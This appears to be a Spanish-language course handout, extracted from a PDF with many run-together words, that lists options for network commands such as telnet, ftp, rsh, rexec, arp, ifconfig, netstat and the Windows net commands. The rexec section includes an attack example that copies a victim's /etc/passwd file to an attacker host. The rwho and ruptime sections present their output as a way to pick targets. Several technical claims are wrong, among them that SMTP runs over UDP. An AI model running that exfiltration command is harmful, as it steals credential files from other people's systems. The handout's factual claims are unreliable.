Embed Size (px)
Citation preview
1
Telnet.- El software de emulación de terminal (Telnet) tiene la capacidad de acceder deforma remota a otro computador. Le permite conectarse a un host de Internet y ejecutarcomandos. Se considera al cliente de Telnet como una máquina local y al servidor deTelnet, que utiliza un software especial denominado daemon, como un host remoto.
TELNET permite estar frente al teclado de una computadora y establecer una sesión enuna computadora remota en la red. La sesión puede ser en una máquina en la mismaoficina, en la misma universidad o al otro lado del mundo. Cuando se conecta, es comosi su teclado estuviera conectado a la computadora remota. Se podrá tener acceso atodos los servicios que esa máquina provee a sus terminales locales tecleando Telnet yel nombre del host o la dirección IP.
Salida
Telnet utiliza las Siguientes opciones:
telnet [-a][-e escape char][-f log file][-l user][-t term][host [port]]
-a intento de conexión automático. Igual que la opción –l a excepción de que seutiliza el nombre del usuario que está conectado actualmente.-e carácter de escape para entrar al símbolo de cliente.-f nombre de archivo para el inicio de sesión de cliente.-l especifica el nombre de usuario para conectarse al sistema remoto. Requiere queel sistema remoto permita la opción TELNET ENVIRON.-t especifica el tipo de terminal. Es compatible con tipos de terminales vt100, vt52,ANSI y vtnt.Host especifica el nombre de host o la dirección IP del equipo remoto paraconectarse.port especifica el puerto para conectarse.
También se puede entrar en modo comando tecleando solo telnet sin ningún argumento,en donde los comandos principales permitidos son:
c - close cierra la conexión actuald - display muestra los parámetros de visualizacióno - open conectarse a un sitio
2
q - quit salir de telnetset - set establecer opciones (escriba 'set ?' para mostrar lista)
sen - send envía cadenas al servidorst - status escribe la información de estadou - unset desactivar opciones (escriba 'unset ?' para mostrar
lista)?/h - help muestra información de ayuda.
El comando Telnet es un comando que se aplica en lo visto en la capa de aplicación, yaque permite que las dos computadoras (cliente y servidor) establezcan un entorno yespecificaciones de una sesión, además de definir los elementos que permiten conocerlas características de la computadora destino.
FTP.- Es un protocolo orientado a conexión que define los procedimientos para latransferencia de archivos entre dos nodos de la red (cliente / servidor). Cada nodo puedecomportarse como cliente y servidor. FTP maneja todas las conversiones necesarias(código de caracteres [ASCII, EBCDIC], tipos de datos, representación de númerosenteros y reales, etc.) Para lograr que se pueda operar entre dos computadores queutilizan sistemas de archivo diferentes y que trabajan bajo sistemas operativosdiferentes. FTP está basado en TCP y como tal provee mecanismos de seguridad yautenticidad.
Para hacer una conexión ftp a alguna máquina se usa el comando ftp seguido delnombre de dominio o dirección IP de la máquina destino, una vez hecha la conexión sepide la cuenta (login) y password para poder establecer una sesión.
Salida
Una sesión FTP se establece de la misma forma que una sesión Telnet. Al igual que loque ocurre con Telnet, la sesión FTP se mantiene hasta que el cliente la termina o hastaque se produce algún tipo de error de comunicación.
Los comandos principales son:
! Salir del shelldelete eliminar archivo remotoliteral enviar un comando arbitrario ftpprompt solicitud de datos en varioscomandos.Send enviar archivo.? Imprimir información de ayuda localdebug modo de depuración
ls muestra el directorioput enviar archivostatus muestra estado actualappend anexar a un archivodir muestra el directoriomdelete eliminar varios archivospwd imprimir directorio remototrace alternar trazado de paquetes
3
ascii establecer tipo de transferenciadisconnect finaliza sesión ftpmdir muestra varios directoriosquit finaliza sesión y sale de ftptype establece el tipo de transferenciabell emite sonidoget recibir archivomget recibir varios archivosquote envia un comando arbitrario ftpuser envia información del usuariobinary establece transferencia binariaglob Alterna meta carácter de nombresde archivos localesmkdir crea un directoriorecv recibir archivo
verbose modo detalladobye finaliza sesión y sale de ftphash Alternar impresión de "#" paracada búfer transferidomls muestra múltiples directoriosremotehelp ayuda remotacd cambia directoriohelp muestra ayuda localmput envía múltiples archivosrename cambia el nombre a un archivoclose finaliza sesión ftplcd cambia directorio localopen conecta a otro ftp remotormdir quita directorio remoto
Al igual que telnet este es un comando que cabe dentro de lo visto en la capa deaplicación del modelo OSI ya que tanto telnet como ftp establecen una conexión con elservidor y la mantienen hasta que se termine el proceso o cierran la sesión.
SMPT.- Define los esquemas de envío y recepción de correo electrónico en la red.SMTP está basado en UDP y soporta el concepto de Spooling. El correo puede seralmacenado por la aplicación SMTP en memoria o disco y un servidor SMTP de la red,eventualmente chequea si hay correo e intenta enviarlo. Si el usuario o el computadorno están disponibles en ese momento, intenta en una segunda oportunidad. Sifinalmente el correo no puede ser enviado, el servidor puede borrar el mensaje oenviarlo de regreso al nodo origen.
SMTP define palabras clave como comandos para hacer sus transferencias de correo. Lasiguiente tabla proporciona una breve descripción de los comandos SMTP que define ladescripción del protocolo.
4
Este protocolo se aplica en dentro de lo visto en la capa de aplicación ya que brinda unservicio de red al usuario, este servicio es el de envió y recepción de mensajes.
RLOGIN.- El comando rlogin (remote login) es parecido al comando telnet, ya que nospermite, al igual que telnet, establecer una sesión de comando interactivo (terminal) enun sistema remoto.
La sintaxis básica del comando rlogin es:rlogin 'host'
Donde 'host' es la dirección con quien queremos establecer la conexión.A parte del parámetro 'host' rlogin incorpora múltiples opciones; estas son:SYNOPSIS: rlogin [-8EKLdx] [-e char] [-k realm] [-l username] host
Opciones:- 8 Permite una transmisión de datos de entrada de 8 bits, lo
que posibilita el envío de caracteres ANSI formateados yotros códigos especiales.
- E Impide el reconocimiento de cualquier carácter comocarácter de escape.(Proporciona una conexión completamente transparente cuandose utiliza con la opción -8).
- K Desactiva la autentificación Kerberos.(Únicamente se utiliza solo cuando se esta realizando unaconexión con un sistema que usa el protocolo deautentificación Kerberos).
- L Permite la ejecución de la sesión rlogin en modalidadlitout.
- d Desactiva la depuración de los sockets TCP utilizados en lacomunicación con el sistema remoto.
- e Establece el carácter de escape para la sesión rlogin. (Elcarácter de escape por defecto es '~')Podremos especificar un carácter literal o un valor octal enel formato \nnn.
- k Solicita a rlogin que obtenga permisos Kerberos - k para elsistema remoto en el dominio especificado en lugar deldominio del sistema remoto determinado por krb_realofhost(3)
-l Establece el nombre de usuario (login) para el host remoto.Si se encontrara disponible, se utilizara la autentificación
5
Kerberos).- x Activa el cifrado DES para todos los datos pasados por la
sesión rlogin. (Podría tener un impacto sobre el tiempode respuesta y utilización de CPU, pero proporciona unmayor nivel de seguridad).
Como es parecido a telnet entra dentro de lo visto en la capa de aplicación, ya que es unservicio mas que ofrece esta capa.
RSH.- El comando rsh (remote shell) activa un shell en el sistema remoto queespecifiquemos y ejecuta la orden que hayamos especificado en la línea de comandosrsh. Si no llegáramos a especificar ninguna orden, nos conectaremos a la maquinaremota como si hubiéramos utilizado rlogin.La sintaxis básica del comando rsh es:
rsh 'host' ['orden']Las ordenes (argumentos) que tenemos disponibles para rsh son:SYNOPSIS: rsh [-Kdnx] [-k realm] [-l username] host[command]
opcionesRSH host [-l nombre_usuario] [-n] command
host Especifica el host remoto en que ejecutar el comando.-l nombre_usuario Especifica el nombre de usuario a usar en el host
remoto. Si se omite, se usará el nombre de usuario de inicio desesión.
-n Redirige la entrada de RSH a NULL.command Especifica el comando que se ejecutará .
-K Desactiva la autentificación Kerberos.- d Desactiva la depuración de los sockets TCP utilizados para
la comunicación con el sistema remoto.- k Esta opción solicita a rlogin que obtenga tickets Kerbero
para el sistema remoto en el dominio especificado en lugardel dominio del sistema remoto determinado porkrb_realofhost(3).
RWHO.- Averigua qué usuarios están conectados en su red. El servicio rwho debe estarhabilitado para que este comando funcione. Este servicio permite enumerar los usuariosque han iniciado sesión de forma remota en los sistemas de la red. Se ejecuta en elpuerto 513 y no es orientado a conexión (de cualquier manera no se necesita establecerconexiones sino solo recibir una respuesta) ya que se ejecuta bajo el protocolo UDP.---------------------------------------------$rwho10.0.25.2 nkt:tty1 Aug 17 11:3610.0.25.126 root:tty2 Aug 17 11:36---------------------------------------------Bajo este comando podemos hacer un "mapa" de conexiones entre usuarios y máquinasque tienen levantado el demonio rwhod con el fin de tantear quién está actualmente en
6
la red (a quién podríamos atacar potencialmente, y de quién deberíamos cuidarnospotencialmente).
RUPTIME.- Este comando permite identificar equipos remotos dentro de una red,conoce su estado de ejecución (si está "levantado"), el número de usuarios conectadosactualmente y la carga del sistema en los últimos 5, 10 y 15 minutos.---------------------------------------------$ruptime10.0.25.2 up 10+15:30, 2 users, load 1.10 1.201.1510.0.25.126 up 10+15:30, 5 users, load 1.20 1.151.20---------------------------------------------Obviamente, este comando facilitaría hacer un "mapa" de los equipos disponibles ypotencialmente vulnerables dentro de una red.
REXEC.- Ejecuta comandos en host remotos que ejecutan el servicio REXEC. Rexecautentifica el nombre de usuario en el host remoto antes de ejecutar el comandoespecificado.
REXEC host [-l nombre_usuario] [-n] comando
host Especifica el host remoto en el que se va a ejecutar elcomando.
-l nombre_usuario Especifica el nombre de usuario en el host remoto.-n Redirecciona la entrada de REXEC a NULL.comando Especifica el comando que se va a ejecutar.---------------------------------------------$rexec nombreUsuario@direccionIPVictima comandop.e.$rexec [email protected] rcp /etc/passwd10.0.25.2:/home/nkt/hackeados/victimaPWD.txt---------------------------------------------En particular, si no se establecen las credenciales de acceso del usuario, este comandointentará verificar el inicio de sesión en el archivo "~/.netrc".
ARP.- Muestra y modifica las tablas de conversión de direcciones IP en direccionesfísicas que utiliza el protocolo de resolución de direcciones (ARP). Existe una tablaindependiente para cada adaptador de red Ethernet o Token Ring instalados en elequipo. Si no se utilizan parámetros, el comando arp muestra Ayuda.
ARP -s inet_addr eth_addr [if_addr]ARP -d inet_addr [if_addr]ARP -a [inet_addr] [-N if_addr]
-a Pide los datos de protocolo actuales y muestra lasentradas ARP actuales. Si se especifica inet_addr, sólo semuestran las direcciones IP y física del equipo especificado.Si existe más de una interfaz de red que utilice ARP, semuestran las entradas de cada tabla ARP.
7
-g Igual que -a.inet_addr Especifica una dirección de Internet.-N if_addr Muestra las entradas ARP para la interfaz de red especificada
por if_addr.-d Elimina el host especificado por inet_addr. inet_addr puede
incluir el carácter comodín * (asterisco) para eliminar todoslos hosts.
-s Agrega el host y asocia la dirección de Internet inet_addrcon la dirección física eth_addr. La dirección física seindica como 6 bytes en formato hexadecimal, separados porguiones. La entrada es permanente.
eth_addr Especifica una dirección física.if_addr Si está presente, especifica la dirección de Internet de la
interfaz para la que se debe modificar la tabla de conversiónde direcciones. Si no está presente, se utilizará la primerainterfaz aplicable.
Ejemplo:> arp -s 157.55.85.212 00-aa-00-62-c6-09 .... Agrega una entrada estática> arp -a .... Muestra la tabla arp.
IFCONFIG.-permite conocer y cambiar la configuración de las tarjetas de red. Paracambiar la configuración de las tarjetas de red, teclee ifconfig eth0 213.186.xx.xxnetmask 255.255.255.0 broadcast 213.186.xx.255 como los valores que acabamos dedar son estándar, puede simplemente teclear ifconfig ETH0 213.186.xx.xx (la máscarade red y el broadcast propuestos corresponden a una dirección de clase C).
Salida
OpcionesAlgunas opciones son:
upMarca la interfaz como disponible para que sea usada por la capa IP. Esta opción vaimplícita cuando lo que se da en la línea de comandos es una dirección. Tambiénpermite reactivar una interfaz que se ha desactivado temporalmente mediante la opcióndown.
down.Esta opción corresponde a los indicadores UP y RUNNING. Down Marca la interfazcomo inaccesible a la capa IP. Esto inhabilita cualquier trafico IP a través de la interfaz.Es importante darse cuenta que esto también borra los registros de la tabla deencaminamiento correspondientes a esa interface de forma automática.netmask mascara
8
Esto asigna una mascara de subred a una interface. Se puede dar como un valor de 32bits en hexadecimal precedido del prefijo 0x, o en notación de cuaterna usando númerosdecimales separados por puntos. Aunque la notación en forma de cuaterna es máscomún, la representación hexadecimal es muchas veces más fácil de usar. Las máscarasde red son esencialmente binarias, y es más fácil hacer una conversión binario-a-hexadecimal que una binario-a-decimal.
pointopoint direcciónEsta opción se usa para enlaces IP punto-a-punto en los que intervienen únicamente dosmáquinas. Esta opción es necesaria para, por ejemplo, configurar las interfaces SLIP oPLIP. Si se ha definido una dirección punto a punto, ifconfig muestra el indicadorPOINTOPOINT.
broadcast direcciónLa dirección de difusión se obtiene, generalmente, usando la parte de red de la direccióny activando todos los bits de la parte correspondiente a la máquina. Algunasimplementaciones de los protocolos IP (por ejemplo, sistemas derivados de BSD 4.2)utilizan un esquema diferente; esta opción proporciona un método para adaptarse a esosentornos mas raros. ifconfig confirma el establecimiento de una dirección de difusiónincluyendo el indicador BROADCAST.
irqEsta opción permite establecer la línea de IRQ usado por ciertos dispositivos. Esto esespecialmente útil para PLIP, pero también puede ser de utilidad para algunas tarjetasEthernet.
metric númeroEsta opción puede ser usada para asignar un valor de métrica a la tabla deencaminamiento creada para la interface. Esta métrica es usada por el Protocolo deInformación de Encaminamiento (RIP) para construir las tablas de encaminamiento parala red.10 El valor usado por defecto por ifconfig es cero. Si no esta ejecutando undemonio RIP, no necesita usar esta opción para nada; si por el contrario lo usa, solotendrá que modificar este valor en contadas ocasiones.
mtu bytesEsto fija la unidad máxima de transferencia, o lo que es lo mismo, el máximo númerode octetos que la interface es capaz de manejar en una única transacción. Para Ethernets,la MTU toma el valor 1500 por defecto (que es el tamaño máximo permitido para unpaquete Ethernet); para interfaces tipo SLIP, el valor por defecto es 296. No hay tamañolímite para el MTU en enlaces SLIP, pero este valor es una buena garantía.
arpEsta opción es especifica de redes de difusión como las Ethernets o las de radio-paquetes. Permite el uso de ARP, el Protocolo de Resolución de Direcciones, paradetectar la dirección física de las máquinas conectadas a la red. Para redes de difusión,esta opción es habilitada por defecto. Si ARP está desactivado, ifconfig muestra elindicador NOARP.-arpInhabilita el uso de ARP para esta interfaz.
9
promiscPone la interface en modo promiscuo. En una red de difusión, esto hace que la interfacereciba todos los paquetes, independientemente de si eran para ella o no. Esto permite elanálisis del trafico de red utilizando utilidades como filtros de paquetes, tambiénllamado fisgoneo de Ethernet. Se trata de una buena técnica para localizar problemas dered que de otra forma resultan difíciles de detectar.
-promiscEsta opción apaga el modo promiscuo.
allmultiLas direcciones de envío múltiple (multicast) son como las direcciones de difusión deEthernet, excepto que en lugar de incluir automáticamente a todo el mundo, los únicosque reciben paquetes enviados a una dirección de envío múltiple son aquellosprogramados para escucharla. Esto es útil para aplicaciones como videoconferenciabasada en Ethernet o audio para red, en los que sólo los interesados pueden escuchar.Las direcciones de envío múltiple están soportadas por casi todas las controladorasEthernet (pero no todas). Cuando esta opción está activa, la interfaz recibe y envíapaquetes de envío múltiple para su proceso. Esta opción corresponde al indicadorALLMUTI.
-allmultiEsta opción desactiva las direcciones de envío múltiple.
INETD.- se conoce como el “Súper Servidor de Internet” debido a que gestiona lasconexiones de varios dæmones. Los dæmones son programas que proporcionanservicios de red. inetd actúa como un servidor de servidor de gestión de otros dæmones.Cuando inetd(8) recibe una conexión se determina qué dæmon debería responder adicha conexión, se lanza un proceso que ejecuta dicho dæmon y se le entrega el “socket”. La ejecución de una única instancia de inetd reduce la carga del sistema encomparación con lo que significaría ejecutar cada uno de los dæmones que gestiona deforma individual.inetd [-d] [-l] [-w] [-W] [-c máximo] [-C tasa] [-a dirección | nombre_de_host] [-pnombre_de_fichero] [-R tasa] [fichero de configuración ]-d Activa la depuración.-l Activa el “logging” de las conexiones efectuadas con écute.-w Activa el recubrimiento de TCP para servicios externos (activado por defecto).-W Activa el recubrimiento de TCP para los servicios internos, ejecutadosdirectamente por el dæmon inetd (activado por defecto).-c Especifica el máximo número de invocaciones simultáneas de cada servicio; elvalor por defecto es ilimitado. Se puede sobrescribir para cada servicio utilizando laopción max-child.-C Especifica el máximo número de veces que se puede llamar a un servicio desdeuna dirección IP determinada por minuto; el valor por defecto es ilimitado. Se puederedefinir para cada servicio utilizando la opción max-connections-per-ip-per-minute.-R Especifica el máximo número de veces que se puede invocar un servicio en unminuto; el valor por defecto es 256. Un valor de 0 permite un número ilimitado dellamadas.-a Especifica una dirección IP a la cual se asocia y sobre la cual se queda esperandorecibir conexiones. Puede declararse también un nombre de máquina, en cuyo caso se
10
utilizará la dirección (o direcciones si hay más de una) IPv4 o IPv6 que estén tras dichonombre. Normalmente se usa un nombre de máquina cuando inetd se ejecuta dentro deun jail, en cuyo caso el nombre de máquina se corresponde con el entorno jail.Cuando se desea asociarse tanto a direcciones IPv4 como a direcciones IPv6 y se utilizaun nombre de máquina se necesita una entrada para cada protocolo (IPv4 o IPv6) para
cada servicio que se active a través de /etc/inetd.conf. Por ejemplo un servicio basado en
TCP necesitaría dos entradas, una utilizando tcp4 para el protocolo IPv4 y otra con tcp6para las conexiones a través del protocolo de red IPv6.-p Especifica un fichero alternativo en el cual se guarda el ID del proceso.
NETSTAT.- es una herramienta útil para comprobar la configuración y actividad de sured. Se llama netstat, aunque se trata en realidad de una colección de herramientascombinadas. Si se ejecuta netstat usando el indicador -r, se puede ver la informaciónde la tabla de encaminamiento del núcleo.Salida
La opción -n hace que netstat imprima las direcciones IP en notación de cuaterna envez de usar los nombres simbólicos de las máquinas o las redes. La segunda columna dela salida producida por netstat informa sobre las puertas de enlace a las que apunta lainformación de encaminamiento. Si una ruta no usa pasarela, el programa imprime unasterisco. La tercera columna imprime el nivel de “generalización” de una ruta.La cuarta columna muestra varios indicadores que describen la ruta:
G La ruta utiliza una pasarela.U La interface esta activa.H Esta interface permite el acceso a una sola máquina. Este es el caso de lainterface de lazo 127.0.0.1.D Esta ruta es creada dinámicamente. Aparece si la entrada de la tabla ha sidogenerada por un demonio de encaminamiento o por un mensaje de redirección ICMP.M Presente cuando este registro ha sido modificado por un mensaje de redirecciónICMP.! La ruta es una ruta de rechazo, y los datagramas serán descartados.
PING.- Este programa nos indica el tiempo exacto que tardan los paquetes de datos enir y volver a través de la red desde nuestro PC a un determinado servidor remoto.Uso:ping [-t] [-a] [-n cantidad] [-l tamaño] [-f] [-i TTL] [-v TOS][-r cantidad] [-s cantidad] [[-j lista de host] | [-k lista de host]][-w Tiempo de espera agotado] lista de destinoOpciones:
-t Solicita eco al host hasta ser interrumpido.-a Resuelve direcciones a nombres de host.-n cantidad de solicitudes de eco a enviar.
11
-l tamaño del búfer de envíos.-f No fragmentar el paquete.-i TTL Tiempo de vida.-v TOS Tipo de servicio.-r cantidad Registrar la ruta para esta cantidad de saltos.-s cantidad Registrar horarios para esta cantidad de saltos.-j lista de hosts Ruta origen variable en la lista de host.-k lista de hosts Ruta origen estricta en la lista de host.-w tiempo de espera agotado de respuesta en milisegundos.
Salida
TRACEROUTE.- El comando traceroute es un ejemplo de cómo emplear de formaingeniosa el funcionamiento de los protocolos de Internet. Lo que intenta hacer elcomando es decirnos las direcciones IP de los routers que hay en el camino entre el hostque ejecuta el comando y el host especificado en el mismo.
El comando construye un paquete UDP dirigido al host que le hemos indicado y a unpuerto al azar, puerto en el que confía que no haya ninguna aplicación esperando datos.Cuando este paquete llegue al host destino, si efectivamente no hay ninguna aplicaciónatendiendo a ese puerto, se producirá un error ICMP del tipo Puerto destinoinalcanzable, El paquete ICMP irá desde ese host hasta la IP del PC que le envió elpaquete UDP. En ese momento, traceroute sabe que ha alcanzado al host destino
% traceroute -n -q 1 IPdelPCC
Donde la opción -n no es imprescindible pero sí conveniente dado que evitará que elcomando intente calcular los nombres (DNS) que corresponden a cada dirección IP queaverigüe. La opción -q permite especificar el número de sondas que queremos que envíetraceroute por cada TTL
12
NSLOOKUP.- La herramienta nslookup permite preguntar a un servidor de nombres(servidor dns) a fin de obtener información sobre un dominio o una máquina. Pordefecto, nslookup utiliza el servidor de nombre configurado sobre su máquina, perosiempre puede preguntar a otro servidor dns [root@xxxxx /] nslookup.
Muestra información que puede usar para diagnosticar la infraestructura de DNS(Sistema de nombres de dominio. El comando Nslookup sólo está disponible si se hainstalado el protocolo TCP/IP.
Sintaxisnslookup [-subComando...] [{equipoBuscado | -servidor}]
Parámetros-subComandoEspecifica uno o varios comandos de nslookup como una opción de la línea decomandos. Para obtener la lista de subcomandos, vea Temas relacionados.
equipoBuscadoBusca información del equipoBuscado utilizando el servidor de nombres DNSpredeterminado actualmente, si no se especifica otro servidor. Para buscar un equipofuera del dominio DNS actual, anexe un punto al nombre.
-servidorEspecifica que este servidor se utilice como servidor de nombres DNS. Si omite -servidor, se usará el servidor de nombres DNS predeterminado.
{ help | ?}Muestra un breve resumen de los subcomandos de nslookup.
Si el equipoBuscado es una dirección IP y la consulta se va a realizar para un tipo deregistro de recursos A o PTR, se devolverá el nombre del equipo. Si equipoBuscado esun nombre y no está precedido por un punto, el nombre predeterminado del dominioDNS se anexa al nombre. Este comportamiento depende del estado de los siguientessubcomandos de set: domain, srchlist, defname y search.
Si se escribe un guión (-) en lugar de equipoBuscado, el símbolo del sistema cambia almodo interactivo de nslookup. La longitud de la línea de comandos debe ser menor de256 caracteres. Nslookup tiene dos modos: interactivo y no interactivo.
Si se necesita buscar sólo un fragmento de datos, se utiliza el modo no interactivo. Parael primer argumento, se escribe el nombre o la dirección IP del equipo que se va abuscar. Para el segundo parámetro, se escribe el nombre o la dirección IP de un servidorde nombres DNS. Si se omite el segundo argumento, nslookup utilizará el servidor denombres DNS predeterminado.
Si se necesita buscar más de un fragmento de datos, se utiliza el modo interactivo, solose escribe un guión (-) para el primer parámetro y el nombre o la dirección IP de unservidor de nombres DNS para el segundo parámetro. O bien, se omite ambosparámetros para que nslookup use el servidor de nombres DNS predeterminado. A
13
continuación se muestran algunas sugerencias acerca de cómo trabajar en modointeractivo:
• Para interrumpir los comandos interactivos en cualquier momento, presione Ctrl+B.• Para salir, escriba exit.• Para tratar un comando integrado como un nombre de equipo, antepóngale el carácterde escape (\).• Un comando no reconocido se interpreta como un nombre de equipo.• Si la solicitud de búsqueda da error, nslookup imprime un mensaje de error.
NET.- Todos los comandos net aceptan las opciones /yes y /. La opción /y respondeautomáticamente `sí’ a cualquier mensaje interactivo que genere el comando, mientrasque /n responde `no’. Por ejemplo, net stop server suele pedirle que confirme quedesea detener todos los servicios que dependen del servicio Servidor; net stop
server /y responde automáticamente `sí’ al mensaje y se cierra el servicio Servidor
Net AccountsActualiza la base de datos de cuentas de usuario y modifica los requisitos de contraseñae inicio de sesión para todas las cuentas. El servicio Inicio de sesión de red debe estar enejecución en el equipo para el que desee cambiar los parámetros de cuenta.
net accounts [/forcelogoff:{minutos | no}][/minpwlen:longitud] [/maxpwage:{días | unlimited}][/minpwage:días] [/uniquepw:número] [/domain]net accounts [/sync] [/domain]
/forcelogoff:{minutos | no}Establece el número de minutos que transcurrirán antes de que se dé por finalizada unasesión de usuario en un servidor tras el vencimiento de la cuenta de usuario o el tiempoválido de inicio de sesión. Con la opción no se impide que se produzca un cierre desesión forzado. El valor predeterminado es no.
Cuando se especifica la opción /forcelogoff:minutos, Windows NT envía unaadvertencia minutos antes de forzar la salida del usuario de la red. Si hay algún archivoabierto, Windows NT advierte al usuario. Si minutos es menor que dos, Windows NTindica al usuario que cierre la sesión de red inmediatamente./minpwlen:longitud
Establece el número mínimo de caracteres para la contraseña de una cuenta de usuario.Los valores válidos oscilan entre 0 y 14 caracteres; el valor predeterminado es de 6caracteres./maxpwage:{días | unlimited}Establece el número máximo de días de validez de la contraseña de una cuenta deusuario. El valor unlimited establece un tiempo ilimitado. La opción /maxpwagedebe ser mayor que /minpwage. Los valores válidos oscilan entre 1 y 49710 días(unlimited); el valor predeterminado es de 90 días.
/minpwage:días
14
Establece el número mínimo de días que han de transcurrir antes de que un usuariopueda cambiar una contraseña nueva. Un valor 0 significa que no hay tiempo mínimo.Los valores válidos oscilan entre 0 y 49710 días; el valor predeterminado es de 0 días.
/uniquepw:númeroImpide que el usuario repita la misma contraseña durante número cambios decontraseña. Los valores válidos oscilan entre 0 y 8 cambios de contraseña; el valorpredeterminado es de 5 cambios.
/domainRealiza la operación sobre el controlador principal del dominio actual. Si no seespecifica este parámetro, la operación se realizará en el equipo local.
Este parámetro se aplica únicamente a equipos con Windows NT Workstation que sonmiembros de un dominio de Windows NT Server. De manera predeterminada, losequipos con Windows NT Server realizan las operaciones sobre el controlador principaldel dominio.
/syncCuando se utiliza en el controlador principal de dominio, causa la sincronización detodos los controladores de reserva de dicho dominio. Cuando se utiliza en uncontrolador de reserva, causa la sincronización de ese controlador de reserva con elcontrolador principal de dominio únicamente. Este comando sólo se aplica a los equiposque son miembros de un dominio de Windows NT Server.
Net ComputerAgrega o elimina equipos de una base de datos de dominios. Este comando estádisponible sólo en los equipos con Windows NT Server.net computer \\equipo {/add | /del}Parámetros\\equipoEspecifica el equipo que se agrega o elimina del dominio./addAgrega el equipo especificado al dominio./delQuita el equipo especificado del dominio.NotasEste comando está disponible sólo en los equipos con Windows NT Server.Todas las adiciones y eliminaciones de equipos se redirigen al controlador principal dedominio.
Net ConfigMuestra los servicios configurables que están en ejecución, o muestra y modifica laconfiguración de un servicio.net config [servicio [opciones]]
Escriba net config sin parámetros para ver una lista de los servicios configurables.
servicio
15
Es un servicio (server o workstation) que puede configurarse con el comando netconfig.
Net Config ServerMuestra o cambia la configuración para el servicio Servidor mientras dicho servicio estáen ejecución.net config server [/autodisconnect:tiempo][/srvcomment:"texto "] [/hidden:{yes | no}]
Se Escribe net config server para ver la configuración actual del servicioServidor.
/autodisconnect:tiempoEstablece el número máximo de minutos que una sesión de usuario puede permanecerinactiva antes de que se desconecte. Puede especificar -1 para que nunca se produzcadicha desconexión. Los valores válidos oscilan entre -1 y 65535 minutos; el valorpredeterminado es 15.
/srvcomment:"texto"Agrega un comentario para el servidor que se muestra en las pantallas de Windows NTy con el comando net view. El comentario puede tener un máximo de 48 caracteres.Escriba el texto entre comillas.
/hidden:{yes | no}Especifica si el nombre de equipo del servidor debe aparecer al presentar la lista deservidores. Tenga en cuenta que el hecho de ocultar un servidor no modifica lospermisos definidos en él. El valor predeterminado es no.
Net Config WorkstationMuestra o cambia la configuración del servicio Estación de trabajo mientras está enejecución.net config workstation [/charcount:bytes] [/chartime:ms][/charwait:s]Se escribe net config workstation para mostrar la configuración actual delequipo local.
/charcount:bytesEspecifica la cantidad de datos que recopila Windows NT antes de enviarlos a undispositivo de comunicaciones. Si se establece también /chartime:ms, WindowsNT actúa según la condición que se satisfaga primero. Los valores válidos oscilan entre0 y 65.535 bytes; el valor predeterminado es de 16 bytes.
/chartime:msEstablece el número de milisegundos durante los cuales Windows NT recopila datosantes de enviarlos a un dispositivo de comunicaciones. Si se establece también/charcount:bytes, Windows NT actúa según la condición que se satisfagaprimero. Los valores válidos oscilan entre 0 y 65.535.000 milisegundos; el valorpredeterminado es de 250 milisegundos.
/charwait:seg
16
Establece el número de segundos que esperará Windows NT a que un dispositivo decomunicaciones esté disponible. Los valores válidos oscilan entre 0 y 65.535 segundos;el valor predeterminado es de 3.600 segundos.
Net ContinueVuelve a activar un servicio interrumpido.net continue servicio
Parámetros
servicioLos servicios que pueden reanudarse son los siguientes: servidor de archivos paramacintosh (sólo para Windows NT Server), servicio de publicación de FTP, lpdsvc,inicio de sesión de red, proveedor de seguridad NT, inicio remoto (sólo para WindowsNT Server), servidor de acceso remoto, schedule, servidor, servicios simples de tcp/ip yestación de trabajo.
En un servidor y en un cliente:Se Usa el comando net continue para volver a activar un servicio interrumpido.Interrumpa el servicio antes de detenerlo para permitir que los usuarios finalicen sustrabajos o se desconecten de los recursos. Para efectuar una corrección poco importanteen un recurso, quizá sea suficiente con efectuar una pausa en el servicio o la impresora.Se Usa después el comando net continue para activar de nuevo dicho servicio oimpresora, sin necesidad de cancelar las conexiones de los usuarios.
En un cliente:Se Usan los comandos net pause y net continue para pasar de las impresorasde la red a la impresora conectada a su equipo.
Net FileMuestra los nombres de todos los archivos compartidos abiertos en un servidor y elnúmero de bloqueos de archivo (si existe alguno) en cada uno de ellos. Este comandotambién cierra archivos compartidos individuales y quita bloqueos de archivo.net file [id [/close]]Se escribe net file sin parámetros para obtener una lista de los archivos abiertos enun servidor.
idEs el número de identificación del archivo.
/closeCierra un archivo abierto y libera los registros bloqueados. Escriba este comando desdeel servidor en el que se comparte el archivo.
EjemploPara ver una pantalla de información acerca de los archivos compartidos, escriba:net filePara cerrar un archivo con el número de identificación 1, escriba:net file 1 /close
17
Este comando también puede escribirse como net files.Se usa el comando net file para ver y controlar archivos compartidos en la red que,en ocasiones, se dejan abiertos y bloqueados por error. Cuando esto sucede, esimposible tener acceso a las partes bloqueadas de un archivo desde otros equipos de lared. Se usa la opción /close del comando net file para quitar el bloqueo y cerrarel archivo.
La pantalla que muestra el comando net file es similar a la siguiente:Archivo Ruta de acceso Nombre de usuario Bloqueos--------------------------------------------------------0 C:\ARCH_A.TXT MARISAF 01 C:\BASEDATOS DAVIDSA 2
Net GroupAgrega, muestra o modifica grupos globales en dominios de Windows NT Server. Estecomando sólo está disponible en los dominios de Windows NT Server.net group [nombre_grupo [/comment:"texto"]] [/domain]net group nombre_grupo {/add [/comment:"texto"] | /delete}[/domain]net group nombre_grupo nombre_usuario[...] {/add | /delete}[/domain]
Se escribe net group sin parámetros para mostrar el nombre de un servidor y losnombres de los grupos de dicho servidor.
nombre_grupoEs el nombre del grupo que va a agregarse, expandirse o eliminarse. Especifique unnombre de grupo para ver la lista de los usuarios correspondientes./comment:"texto"Agrega un comentario para un grupo nuevo o existente. Dicho comentario puede tenerhasta 48 caracteres. Escriba el texto entre comillas.
/domainRealiza la operación sobre el controlador principal del dominio actual. Si no seespecifica este parámetro, la operación se realizará en el equipo local.Este parámetro se aplica únicamente a equipos con Windows NT Workstation que sonmiembros de un dominio de Windows NT Server. De manera predeterminada, losequipos con Windows NT Server realizan las operaciones en el controlador principal deldominio.
nombre_usuario[...]Muestra la lista de uno o más usuarios que se agregarán o quitarán de un grupo. Separelos nombres de usuario con un espacio en blanco.
/addAgrega un grupo o un nombre de usuario a un grupo. Debe establecerse una cuenta paralos usuarios agregados a un grupo con este comando.
/deleteQuita un grupo o un nombre de usuario de un grupo.
18
EjemplosPara ver una lista de todos los grupos en el servidor local, escriba:net groupPara agregar un grupo llamado ejec a la base de datos local de cuentas de usuario,escriba:net group ejec /add
Para agregar un grupo llamado ejec a la base de datos de cuentas de usuario de undominio de Windows NT Server desde un equipo con el software Windows NTWorkstation instalado, escriba:net group ejec /add /domain
